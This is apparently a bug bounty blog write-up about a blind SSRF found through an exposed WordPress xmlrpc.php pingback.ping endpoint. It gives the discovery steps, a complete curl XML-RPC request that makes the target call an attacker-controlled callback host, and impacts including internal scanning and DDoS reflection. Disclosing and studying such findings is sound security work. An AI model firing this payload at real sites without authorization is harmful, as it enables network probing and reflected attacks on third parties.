FREE LINK

This bug is called BLIND SSRF VIA XMLRPC PINGBACK METHOD.

While testing the website, I discovered that the WordPress XML-RPC endpoint (/xmlrpc.php) is exposed and accepts unauthenticated pingback.ping requests. This allows an attacker to force the server to initiate outbound HTTP requests to attacker-controlled domains.

This creates a blind Server-Side Request Forgery (SSRF) primitive. The attacker can use this behaviour to:

  • Discover the origin IP and network position of the server
  • Potentially scan/reach internal hosts (private IP ranges)
  • Abuse the site as a DDoS reflector toward any external victim

How to find it:

  1. Visit https://www.redacted.com/xmlrpc.php and check if it accessable or not if it is forbbiben it will show 403 FORBIDDEN. But if it is open you will see something like this:
None
  1. Prepare an out-of-band listener (Burp Collaborator / Interactsh)
  2. Capture its unique callback URL (e.g., http://<attacker-domain>.oast.me)
  3. Send the request::
curl -s -H "Content-Type: text/xml" \
--data '<?xml version="1.0"?>
<methodCall>
  <methodName>pingback.ping</methodName>
  <params>
    <param><value><string>http://burpcollaburator.oastify.com</string></value></param>
    <param><value><string>https://www.[REDACTED]</string></value></param>
  </params>
</methodCall>' \
https://www.[REDACTED]/xmlrpc.php
None
  1. Observe DNS/HTTP requests received at the listener
None

Potential Impact this vulnerability can have is:

  • Blind SSRF: attacker can direct server requests to arbitrary external or internal addresses
  • Server IP / network exposure: internal network position leaked via callback
  • DDoS amplification: a long-known attack vector abusing WordPress pingback functionality
  • Possible interaction with internal admin panels, cloud metadata endpoints, or private infrastructure if reachable

No authentication required → botnet-style exploitation becomes trivial.

Below i am giving other hackerone reports for the same vuln:

U.S. Dept Of Defense disclosed on HackerOne: SSRF on ████████

Summary:** The web application hosted on the "███████" domain is affected by a Server Side Request Forgery (SSRF)…

hackerone.com

U.S. Dept Of Defense disclosed on HackerOne: SSRF vulnerability on...

Summary:** A server side request forgery vulnerability appears to leak an internal IP address and tries to connect to…

hackerone.com

Next, it was accepted by the program as a P4. I wasn't paid, though, but still got a certificate:

None

Like and follow if you enjoyed, and comment if you want an article on a specific topic.

Also, check out some other articles :

How i hacked a website just by looking at the source code

FREE LINK

osintteam.blog

A Factory in Silence: How a Cyberattack Brought Jaguar Land Rover to a Stop

A Factory in Silence: How a Cyberattack Brought Jaguar Land Rover to a Stop They were supposed to be building Range…

osintteam.blog

A Glitch in the Pit Lane: How a Security Flaw Exposed Max Verstappen's Passport Data

A Glitch in the Pit Lane: How a Security Flaw Exposed Max Verstappen's Passport Data Yes you heard it right someone got…

osintteam.blog

How Did I Hack a Website Just by Reading JS Files

For privacy reasons I’ll use [REDACTED] instead of the app’s real name.

osintteam.blog

How I Crashed Example Health's CORS Party 🎭

ow I Crashed Example Health's CORS Party 🎭 FREE LINK So there I was, casually poking around a healthcare company's…os

osintteam.blog

Dorks For Sensitive Information Disclosure Part-4

Dorks For Sensitive Information Disclosure Part-4 Oh Look, Your Secrets Are on Google (Again) FREE LINK 📖 The Dork…o

osintteam.blog

Stay curious. Stay dangerous. 💻🕶

👉 Follow me on LinkedIn 💼 | Portfolio 🧑‍💻